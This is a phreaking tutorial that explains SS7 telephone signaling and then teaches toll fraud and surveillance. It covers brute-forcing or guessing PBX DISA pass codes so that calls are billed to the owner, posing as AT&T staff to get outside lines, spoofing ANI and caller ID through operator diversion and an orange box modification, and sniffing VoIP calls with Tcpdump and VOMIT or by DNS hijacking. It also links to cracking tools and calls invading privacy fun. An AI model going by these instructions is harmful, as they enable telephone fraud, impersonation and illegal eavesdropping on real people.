Phreak 2k

by protonigger

Section 1: The Introduction

Lack of recent information on the internet in relations to phreaking has been a real problem lately. This simple fact has lead many to believe that phreaking itself is dead. Of course this is untrue. Therefore, in writing this tutorial, I am giving you, the reader, the chance to try out phreaking as it is today. Enjoy...

Section 2: Understanding How It All Works

One of my favorite lines I love to use when explaining such topics is that one can not expect to break into something, or take advantage of something without first understanding how it operates. So therefore to start off this tutorial, I think it will be nice to first review how telco operates. I welcome you, the reader, to the world of SS7 (Signaling System 7). SS7 is an architecture for performing out-of-band signaling in support of functions established on the PSTN (public switched telephone network). This includes call-establishment, billing, routing, and information exchange.It identifies functions to be performed by a signaling-system network and provides a protocol to enable their performance. When I speak of out-of-band signaling, I am refering to signaling that takes place on a separate path than the path that the conversation is using. In this case, SS7 establishes a separate digital channel for the exchange of signaling information, which is called a signaling link. Therefore, when a call is placed, all the necessary signaling messages (dialed digits, selected trunk, etc.) are sent between switches using their signaling links, rather than the trunks (which carry the conversation). This concept of signaling is extended to the caller with the use of an ISDN D channel (since SS7 deals with signaling between networking elements). Therefore, the information that makes up the call is carried over B channels, while the signaling information is carried over a D channel. This makes the whole process more robust by allowing signaling information to be transmitted during the entire duration of the call, instead of just in the beginning. Now let's get into the structure of SS7. The simplest design for the signaling network architecture is called associated signaling. This works by allocating ones of the paths between each interconnected pair of switches as the signaling link. This architecture works quite efficiently as long as a switch's only signaling requirements are between itself and other switches to which it has trunks, and this is the architecture that you can find implemented in Europe. However, the USA wanted to design a signaling network that would enable any node to exchange signaling with any other SS7-capable node. This of course makes signaling much more complicated when the exchange of signaling is done between nodes that have no direct connection. This concept of signaling spawned the North American SS7 architecture. Under this architecture, a completely new and separate signaling network is defined. There are three essential components that the network is built on, and these components are connected by signaling links. The first component we will discuss is signal switching points (SSPs). These are telephone switches (end offices or tandems) that are equipped with SS7-capable software and terminating signaling links. They generally originate, terminate, or switch calls. The next component is signal transfer points (STPs), which are the packet switches of the SS7 network. They receive and route incoming signaling messages towards the proper destination, and perform specialized routing functions. And finally there are signal control points (SCPs), that are databases that provide the information necessary for advanced call-processing capabilities. Now lets take a look at the link types that are used on SS7. A links interconnect an STP with either an SSP or an SCP (the A stands for access). This means that A links handle delivering signaling to and from signaling end points. Now while an SSP is connected to it's home STP pair through a set of A links, the reliability of such a link can be provided by deploying an additional set of links to a second STP pair. These are called E links (the E means extended), which provide backup connectivity in the event that the home STPs can not be reached via A links. C links are links interconnecting mated STPs (the C in this instance, stands for cross). These links are also used as well to provide reliability in the instance that other links are unavailable. However, the actual carrying of signaling messages beyond the initial entry point to the signaling network, and on to their intended destination is handled by B/D links. The B (which stands for bridge) describes the interconnecting peer pairs of STPs, while the D means diagonal and describes the quad of links interconnecting mated pairs of STPs. Then there are F (fully associated) links which directly connect two signaling end points. However, due to the fact that F links bypass the security features that are provided by an STP, they are not generally deployed between networks. So now that we understand the types of links implemented in the switching system, we can discuss exactly what goes over a signaling link. Well, basically signaling information is transfered in messages that are called SUs (signaling units). Now there are three types of SUs that are defined according to the SS7 protocol. MSUs (message signaling units), LSSUs (link status signal units), and FISUs (fill in signal units). These SUs are transmitted continuously in both directions on any given link that is in service. Signaling points that don't have MSUs or LSSUs to send will send FISUs over the link (in other words, to make it easy for those of you who may be scratching your heads now, whenever a signaling point is not sending information during a call, it is sending FISUs, which simply fill up the signaling link until it is needed to send other types of signaling). Now lets take all this SS7 networking that I have been discussing, and discuss the layers that compose of this protocol. The most obvious layer of the SS7 protocol of course is the physical layer, which defines the physical and electrical characteristics of the signaling links. The second layer I will discuss is the MTP (message transfer part), which is separated into two levels. MTP Level 2 provides the link-layer functionality that ensures that messages can properly be sent between signaling links, while MTP Level 3 extends MTP Level 2 to provide network layer functionality. Another layer used is SCCP (signaling connection control part), which allows for addressing applications within a signaling point. These applications are referred to as subsystems, and include 800 call processing, calling-card processing, CLASS (custom local area signaling services) services like call return, etc. Another function featured with SCCP is GTT (global title translation), which provides the ability to perform incremential routing. This allows originating signaling points to not have to know every potential routing destination that will have to be used. The next layer of discussion is ISUP (ISDN user part), which defines the messages and protocol used in the establishment and tear down of calls sent over the PSN (public switched network). In the North American SS7 architecture, ISUP messages rely exclusively on MTP to transport messages between nodes. Next is TCAP (transaction capabilities application part), which defines the messages and protocol used to communicate between subsystems. Of course, this means that TCAP uses SCCP for transport. And finally, OMAP (operations, management, and administration part), which defines messages and protocol designed to assist administrators of the SS7 network. OMAP uses both MTP and SCCP for routing. So now that we understand the layers that compose SS7, lets discuss the addressing scheme used. Individual signaling points on a SS7 network are assigned to a cluster, or group of signaling points. Now within this cluster, each signaling point is assigned a member number. In the North American SS7 architecture, each node is addressed by a three-level address number. This address number is assigned based on it's network, cluster, and member numbers. Each of these numbers is an 8-bit number and can range in value from 0 to 255 (sound familiar?). The network number is based nationwide by a neutral party. RBOCs (regional bell operating companies), major independant telephone companies, and IXCs (interexchange carriers) already have network numbers assigned. The cluster that the nodes are assigned to is based on the state which the node resides in. And of course, as with other network addressing schemes, 0 is not available for assignment, and 255 is reserved for future use. Well this pretty much wraps up my explanation of SS7. If you have reached the end of this section utterly confused, feel free to read over it again until you can better understand it. It's important to understand how the PSTN works. It's also nice to note that not every area on the globe has SS7 implemented in the switching system, but unless you live in a third world country, then most likely the switching system used is SS7.

Section 3: Understanding How To Make It Work For You

So now that we understand how the PSTN works, let's start discussing the fun part. I clearly can not cover all areas, aspects, and techniques used in phreaking. I am merely going to describe a few activities that you can try, as a beginner, to get your feet wet in the activity known as phreaking. One activity worthy of a brief mention is handscanning. This is preferred over wardialing, due to the fact that it is a tad less obvious, if properly done, and can pick up on a few treasures that your average wardialer can't. To handscan you will need to start off with a prefix (the prefix is those three numbers you see in the middle of a phone number, for example, 555-xxx-5555, where the x's indicate the prefix). Now to handscan properly, you will not want to incrementially search for numbers (i.e. as in dial -0001, -0002, -0003, etc). You will instead want to choose a more random scheme for searching, in order to make such activities less obvious. If you have the patience (which you will need), then there are a lot of treasures to be found with handscanning. Such finds include backdoors and VMBs (voice mail boxes), just to name a few. Now, since there have already been articles written on what to do after finding such things, I will not get into such concepts within this tutorial. I will instead link you, the reader, to such articles at the end of this one, so that you can further educate yourself after reading this tutorial (hint: when choosing a prefix you aren't sure about, dial 1-800-xxx, the x's meaning the prefix you choose, and wait. If you get some tones, then choose another prefix). Now let's discuss PBXs (Private Branch eXchange). A PBX is, simply put, a private phone switch used to provide an internal phone system. Remember in high school when you had to press 9 before dialing out? That's because the school used a PBX, and you needed to put in the extension, before dialing out. Such internal phone systems consist of a small phone switch, a group of outbound trunks (which are nothing more than phone lines to the outside), a set of telephones, and a bunch of users. So how are such internal phone systems useful to us? Well we can use dialouts on the PBX to seize an outbound trunk, and make all the calls we want at the PBX owner's expense. The best part of this trick is it's a relatively simple task to accomplish. You simply break into the DISA port. A DISA (Direct Inward System Access) port is a maintenance feature on a PBX. You connect into the DISA port, input the pass code, and there you go. You have just seized an outbound trunk of that PBX. This is really not as hard as it sounds. These codes are usually four digits, and are usually pass codes like 0000, 1111, 1234, etc. The range for such codes are 4 - 6, but as I said, it's usually just a 4 digit code. There is a tool that apparently is supposed to help someone like yourself with accomplishing such a task. I haven't tried it out myself, but I will add a link to the file nonetheless at the end of this tutorial. There is also another option you can use if breaking DISA ports seems like too much work for you. Just simply call up the number of the PBX you want to snatch, and then ask to use extension 90. If they ask why, say you are working for AT&T and need to test the lines. This usually works, and will allow you to dialout from the PBX (since 9 is the extension for dialing an outside number, and 0 is for the operator). Now while we are on the subject of making free long distance calls, let's get into the new wave trend of such activities, ANI (Automatic Number Identification) spoofing. ANI is a service in which the directory/equipment number of a calling station is obtained. ANI is also often used interchangeably with ANAC by those who don't know any better (consult google for further information on how ANI operates). An ANAC (Automatic Number Announcement Circuit) is a number you can call to tell you what number you are calling from. A lineman and a phreak both use them for this purpose. There is also ANI II, which is an additional feature of ANI which adds a pair of digits to the ANI readout that tells what type of service the number is. So how do we spoof ANI? Well one rather easy way of accomplishing this is by op diverting (having the operator dial a number for you, this works because most operator centers are not equipped to forward ANI). This is pretty much a social engineering feat. As of the release of this information, this tactic no longer works on AT&T via 800-call-att, but there are a lot of other ways of accomplishing this that still work. An example of op diverting that I believe still works is the 710 trick made popular by Lucky225 (as with the whole technique of ani/caller id spoofing period). You perform this trick by op diverting to 800-673-7286 and telling the operator that you want to make a call from any number in the 710 area code and want to bill the call collect. The party you are calling will not be billed because the 710 area code does not exist within the AT&T database. There are also certain call forwarding services that you can use to op divert. A link to a site that offers call forwarding services will be provided at the end of this tutorial. Now since we have discussed ANI spoofing, we might as well get into caller ID spoofing. Well if you have call waiting ID, then you should notice that you hear two tones. The first tone you hear is a SAS (Subscriber Alert Signal, also known as a "call waiting beep"), and the second tone you hear is a CAS (Customer Premise Equipment[CPE] Alert Signal). The first SAS signal is just a normal call waiting beep, while the second CAS signal is a tone that alerts the CPE (your call waiting box) that there is a call waiting call. The CPE then mutes the handset and sends an acknowledgement DTMF tone to the central office that tells the CO that it's ok to send the caller ID information. The CO thusly sends the information in FSK format. The name and number is then promptly displayed on the CPE, and the handset is unmuted. So now that we understand how such a device works, we will proceed to discuss how such a signal can be spoofed. Well to do this manually, which we will discuss purely for educational sakes (you'll understand why in a minute), we will need a recording of a FSK transmission. You will do this by first ordering caller ID on your phone, and call the phone when it is in use but without any caller ID devices attached to the phone. You will hear the CAS send the acknowledgement DTMF ("A" or "D") tone back to the CO, and the CO send back the response FSK transmission. You will upon hearing these tones record all this on a microrecorder. Once you have the FSK recorded, call the number you want to call with the generated CID, and push in the CAS signal. You will hear his/her CPE respond with a DTMF signal, and you will then push in the FSK transmission. The CPE will thusly display the signal that you sent through. You can create an orange box (CAS tone generator) to generate this tone by modifying a tone dialer. You will simply take out the 3.58mhz crystal and replace it with a 8.192mhz crystal. You then press the * button, which will generate the CAS tone. You can also generate the DTMF tone with a silver box (which information about I will link you to at the end of this tutorial). Now why I said that this is for the sake of education is because there is already software available that will allow you to generate these tones on your computer. A link to an orange boxing application will, as with many things, be linked to at the end of this tutorial. I was going to carry this section further by explaining payphones, and what you can do with them nowadays, but I feel that it's best to just wrap this up and link you to information that you can use to further your knowledge of such concepts in my links section. So this wraps up my section on Understanding How to Make it Work For You. I have hopefully given you some techniques and concepts that you can use to start off into phreaking. It will be up to you to continue learning and exploring to further your knowledge of such related concepts, and I wish you the best of luck on that.

Section 4: VoIP

I decided to include a section for VoIP (Voice over Internet Protocol), considering VoIP is becoming to be viewed as promising new technology, is beginning to be implemented on phone networks, and has shown itself to be quite flawed. I will in this section explain VoIP, so that you will have a better understanding of it in the instance that you attempt to exploit it. There are two protocols that are being utilized by VoIP. H.323 and SIP (Session Initiation Protocol). H.323 is an complex suite of protocols that provides specifications for real-time, interactive videoconferencing, data sharing, and audio applications such as IP telephony. Go to http://protocols.com/pbook/h323.htm to get more detailed information on the suite of protocols within H.323. SIP on the other hand is a more streamlined protocol developed specifically for IP telephony. SIP is smaller, more efficient, and takes advantage of existing protocols to handle certain parts of the process. MGCP (Media Gateway Control Protocol), for example, is used by SIP to establish a gateway connecting to the PSTN. Once again I will leave it up to the smart individuals over at protocols.com to explain the specifics of SIP with you. Go to http://www.protocols.com/pbook/VoIPFamily.htm#SIP for further information on the SIP protocol. So now, if you have read both the protocol links for information on protocols used within VoIP, then you have a pretty good understanding about how VoIP operates. So now that we understand how VoIP operates, let's discuss weaknesses within VoIP that we can use to our advantage. Well, thanks to the wonderous world of wireless technology, we can use a tool like Tcpdump to simply attach to a wireless network and sniff out VoIP traffic. We would then use a tool like VOMIT (Voice Over Misconfigured Internet Telephony) and reassemble this traffic into a wave format, thusly listening in on a conversation that is taking place over the network. We can also perform a dns hijack to redirect this traffic to a specified server, and perform the same action as above. As you can see from this, when VoIP becomes the norm, you will be able to utilize wardriving to listen in on VoIP client users. This makes invading others privacy very fun. Of course, we are not quite at the point yet where VoIP is widely used, but we can look towards tomorrow for such activities.

Section 5: Conclusion

I hope you all enjoy reading this as much as I enjoyed writing it. Hopefully this tutorial will get some of you out there interested in phreaking, and will help educate those who are already interested, but don't know how to start. So good luck, and happy phreaking.

Section 6: Links

www.totse.com/en/phreak/vmb_pagers_e_mail/hackvmb.html - a rather old tutorial on breaking VMBs, but it's pretty much the same concept.

www.artofhacking.com/orange.html - a program you can use to generate CAS tones

www.totse.com/en/phreak/boxes_old_and_new/silver02.html - Silver Box plans

www.phreak.org - a decent phreak site

www.phonelosers.org - another good phreak site

www.verizonfears.com - Lucky225's site

http://thc.pimmel.com/files/thc/thc-ph11.zip - the PBX tool previously mentioned

http://artofhacking.com/boxrvw1.htm - offers rating on skill, risks, plausibility, and obsolescence. Good for those of you who want to know which boxes can and can't be used...

http://cal.phonelosers.org/cgi-bin/index.cgi?action=viewnews&id=46 - a nice article that gets into how your modern payphone operates, and weaknesses within such a payphone.

www.packetsurge.com - just because we 0wn! =)

www.cyberphaze.net - couldn't forget about these guys.

(the last two links are purely promotional, but make sure to visit them, they're very good sites with lots of information that you may find useful)

Note: I'd like to give recognition to Hallakaust for giving me the information on the *90 trick, and for notifying me of the tool listed above. As well as Stephen K. Gielda.

Note again: For those of you who have any questions or comments and feel the need to reach me you can do so at [email protected]

(p.s: Love ya Julie!)